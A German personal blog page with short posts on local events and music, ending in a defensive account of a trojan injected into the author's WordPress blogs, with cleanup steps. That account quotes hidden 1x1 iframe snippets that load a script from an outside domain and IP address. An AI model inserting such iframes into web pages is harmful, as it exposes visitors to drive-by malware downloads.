Heute wurde ich wieder einmal am Telefon von einer netten Dame kontaktiert: “Mein Name ist Böske, kann ich den Geschäftsführer sprechen?” Die Frau war mir genauso wildfremd wie ich ihr. Sonst hätte sie wohl gewußt, wo und wen sie anruft. Den Rest des Beitrags lesen »
Motorsport hautnah erleben konnte jeder am Pfingstsonntag im Bremerhavener Fischereihafen. Nicht nur an der Bahn gab es schnelle Bikes zu bestaunen. Im Fahrerlager konnte man jede Menge moderne und alte Motorräder bei herrlichstem Wetter bewundern und darüber fachsimpeln.
Zu den Fotos … Und hier ist mein Video vom Fishtown-Race 2008 …
Viel Lärm um Lärm wurde am gleichnamigen “Tag des Lärmes” in den Magazinsendungen von ARD und ZDF gemacht. Dabei ging es allerdings keineswegs nur um Verkehrslärm oder die Belastung am Arbeitsplatz.
Im Frühstücksfernsehen wurde mit Meßgeräten die Geräuschbelastung eines Rasierapparates als gesundheitschädlich diagnostiziert. Das gleiche gelte auch für lautes Reden.
Ein solches Ereignis findet nur sehr selten statt: In Bakum wurde eine neue Kirchengemeinde ins Leben gerufen. St. Johannes Bapt. entstand aus den Pfarrgemeinden in Bakum, Vestrup, Lüsche und Carum.
Es war ein erhebender Moment, als die Urkunde des Bischofs verlesen wurde und die neuen Kirchenbücher dem Pfarrer überreicht wurden. Und ach ja, auch ein neuer Pfarrer wurde ins Amt eingeführt und den kath. Christen der Gemeinde Bakum vorgestellt: Er heißt Bernhard Schmedes und eroberte die Herzen der Gläubigen im Fluge.
Bürgermeister Lehmann wies auf die Bedeutung dieses Ereignisses hin: Was auf politscher Ebene seit 1945 längst Wirklichkeit ist, ist nun auch in kirchlicher Hinsicht der Fall. Die Gemeinde Bakum ist eine Einheit aus Bakum, Carum, Vestrup, Lüsche und nicht zu vergessen zehn weiteren Bauerschaften. Gehen nun auch die Menschen in der Gemeinde einen Schritt aufeinander zu? Zu wünschen wäre es.
Nix Banane - sondern Hits der 70iger und 80iger pur - dies gabs in der Vechtaer Kneipe “Banane” auf die Ohren. Die 42nd Street Band brachte Hits von Gary Moore bis Lynyrd Skynyrd auf die Bühne. Die guten alten Zeiten lebten wieder auf. In die “Banane” waren auch jede Menge Leute aus der Vechtaer Musikscene gekommen, die sich bei dieser Gelegenheit mal wieder trafen. Ein netter Abend.
Vechta rockt! Die Kultrocker YOUNG&GREY, nicht mehr ganz jung und schon ein wenig grau, diesmal mit neuer Frontfrau, ließen die 70iger Jahre wieder aufleben und rockten, was ging. Die Hütte im Hotel “Drei Kronen” war gerammelt voll, die Stimmung zum Bersten.
Seit Wochen beschäftigt mich der Kampf gegen Spam in von mir betriebenen WordPress-Weblogs. Betroffen sind außer mir vor allem viele andere zumeist private Leute, die ihr WordPress-Blog auf einem eigenen Webspace installiert haben. Leider wird Spam mittlerweile nicht mehr nur per Kommentar in Weblogs eingesandt. Hacker fügen unerwünschte Links und schadhaften Programmcode inzwischen direkt in Blogbeiträgen ein. Ich möchte meine Erfahrungen gerne mit anderen austauschen, die ebenfalls hiervon betroffen sind oder waren.
Der kanadische Bluesgitarrist Jeff Healey ist gestern im jungen Alter von erst 41 Jahren an Krebs verstorben.
Dies ist heute überall im Internet veröffentlicht worden. Auf dem deutsche Bluesportal Blues News habe ich es zufällig gelesen.
Jeff Healey ist einer der Bluesrockgitarristen, die mich besonders fasziniert haben. Ich habe ihn vor langen Jahren auf einem Openair-Festival in Petershagen - wann weiß ich nicht mehr genau - live gesehen. Der blinde Gitarrist spielte die Gitarre sitzend auf dem Schoß, wie es fast unmöglich schien und holte aus der Gitarre wahnsinnige Sounds, Riffs und Läufe heraus. Bei dem Mann, der schon damals sehr in seinen Möglichkeiten eingeschränkt war, beeindruckte mich, dass auch in so einer Lebenssituation jemand in der Lage ist, den Blues zu spielen und zu leben.
Berühmt waren seine Scheiben “Hell to Pay” und “See the Light”.
Bildquelle: Wikipedia - Jeff Healey im Jahr 2007
Mittlerweile ist es schon beim letzten Zeitgenossen angekommen, wie bequem es ist, Neuigkeiten per Email zu senden. Ich bekomme solche Rundschreiben von Vereinen, Musikerkollegen und Privatleuten. In absehbarer Zeit gibt es niemanden mehr, der nicht per Email erreichbar ist. Dann wird das elektronische Rundschreiben in jedem Verein Standart sein. Viele Versender solcher Nachrichten sind dabei häufig sehr gedankenlos im Umgang mit den Daten ihrer Empfänger.
Trojaner-Warnungen können Nerven, Zeit und Kopfschmerzen kosten. Auf den von mir verwalteten WordPress-Blogs http://fv-bakum.de und http://feuerwehr-bakum.de schlich sich böser Code ein. Beide laufen auf einem auf einem 1&1-Webspace installierten WordPress-System. Besucher sprachen mich immer wieder darauf an, dass ein Trojaner auf meinen Seiten wäre.
Es handelte sich um den Trojaner “TR/Dldr.HTML.Agent.IS”. Falls Ihr Antivirenprogramm beim Besuch einer Internetseite alarmiert hat, benachrichtigen Sie bitte den Webmaster mit einem Hinweis auf diese Seite. Wie Sie als Webmaster diesen Trojaner aus Ihrem Blog entfernen können, erfahren Sie unten am Ende des Beitrags.
Ich konnte mir dies gar nicht denken, aber weil sich diese Warnungen häuften, beschloss ich der Sache auf den Grund zu gehen. Da ich aus Sicherheitsgründen immer mit dem Firefox-Browser von einem eingeschränkten Nutzerkonto aus ins Internet gehe, hat mich mein Antivirenprogramm Antivir nie vor einem gefährlichen Trojaner gewarnt. Anscheinend mag der den Firefox nicht.
Ich erkundigte zunächst mich im WordPress-Deutschland-Forum. Dort waren die Reaktionen erst ratlos. Ein Trojaner habe man nicht auf meinen Seiten gefunden. Einer fand aber dann doch eine solch gefährliche Warnung. Anscheinend surfen die Spezis in diesem Forum wohl auch nicht mit dem Internet Explorer.
Nun wechselte ich in das Administrationskonto und rief mit dem Internet Explorer 7 beide Seiten auf. Leider ist dies ja immer noch der übliche und ziemliche unsichere Weg des Normalnutzers von Computern in das Internet. Und sofort warnte mich Antivir: Das “Trojanische Pferd TR/Dldr.HTML.Agent.IS” verlangte den Zugriff auf meinen Rechner. Zur großen Darstellung der Warnung …
Ich hatte bereits Stunden verwandt, um alle Dateien meiner WordPress-Installationen (mit den dazu notwendigen Datensicherungen) auszutauschen. Jedoch war dies erfolglos. Der Trojaner wollte nicht weichen. Nach einigen Rückfragen im WordPressforum stellte sich heraus: Ein böser Code wurde einfach mit einem Verweis auf eine Script-Datei in meinen Beiträgen eingebettet, mit der anscheinend dieser Trojaner in fremde Rechner geschleust wird:
<iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> oder
<!– Traffic Statistics –> <iframe src=”http://61.155.8.157/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics –>
Wenn man diesen Quellcode glaubt man, es handle sich um eine Statistikfunktion von WordPress. Doch da irrt man gewaltig. Die DomainS wp-stats-php.info bzw. http://61.155.8.157 sind in China registriert. Beim Aufruf eines derart infizierten Beitrags wundert man sich, dass die Ladezeit erheblich verlängert wird. In der Statuszeile des Browsers erscheint “wp-stats …info”. Da dies so ähnlich aussieht wie eine interne WordPress-Funktion, schöpft man nicht so schnell Verdacht, dass in diesem Moment ein Trojaner von einer chinesischen Quelle aus dem Rechner eingeschleust wird.
Ein einfacher Blick in den Seitenquelltext eines Beitrags reicht aus, diesen schädlichen Code in den Beiträgen sofort zu entdecken. Selbstverständlich habe ich die “infizierten” Beiträge sofort entfernt. Bei einem Update der WordPress-Installation werden die Beiträge nicht geändert. Deshalb konnte der schädliche Code beim Auswechseln der WordPress-Dateien auch nicht beseitigt werden sondern nur, indem man die betroffenen Beiträge entfernt.
Der Code versteckt sich im HTML-Code eines Beitrags, welcher nach Erzeugung durch das WordPress-Script in der mysql-Datenbank abgelegt und gespeichert wird. Wird der Beitrag aus der Datenbank abgefragt, wird auch wieder der in der Datenbank abgelegte böswillige und für den normalen Nutzer nicht sichtbare Code im Beitrag hinzugefügt. Der Code versteckt sich also in der Datenbank und nicht direkt in den Script-Dateien von WordPress.
Das gleiche Problem ist übrigens nicht nur bei WordPress-Blogs sondern auch bei Homepages, die mit Joomla verwaltet werden, aufgetreten.
Nur was soll man jetzt noch machen? Wo ist die Sicherheitslücke? Wie kommt dieser böse Quelltext in mein Blog? Wie kann man verhindern, das dieser Code sich so einfach in ein WordPress-Blog schleichen kann? Ich habe alle Dateien der Installation getauscht, meinen Rechner mit dem Antivirenprogramm Antivir gescannt. Nun weiß ich auch nicht, was ich sonst noch so tun kann.
Um den “Trojaner” aus Ihrem Blog zu löschen, rufen Sie mit Ihrem Browser die Seiten mit Ihren Beiträgen auf. Bei den WordPress-Blogs sind dies standartmäßig die Startseite und bei vielen Beiträgen die weiter gelinkten Fortsetzungsseiten. Nun müssen Sie sich den Quelltext dieser Seite ansehen. Klicken Sie dazu mit der rechten Maustaste auf die Seite und wählen Sie “Quellcode anzeigen” aus. Der Quellcode wird angezeigt. Schauen Sie nach, in welchem Beitrag der Quellcode
<iframe src=”http://www.wp-stats-php.info/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe>” oder ähnlich, z.B.:
<!– Traffic Statistics –> <iframe src=”http://61.155.8.157/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe> <!– End Traffic Statistics –>
vorhanden ist. Melden Sie sich jetzt in Ihren Blog an und löschen Sie den betreffenden Beitrag aus Ihrem Blog. Alternativ können Sie auch nur den böswilligen Code aus dem HTML-Code des befallenen Beitrag entfernen, wenn sie den Beitrag nicht löschen möchten. Damit haben Sie den Code gelöscht, über den der Trojaner in Ihr Blog eindringt. Für die Folgen bei Anwendung dieses Hinweises übernimmt der Verfasser keinerlei Haftung.
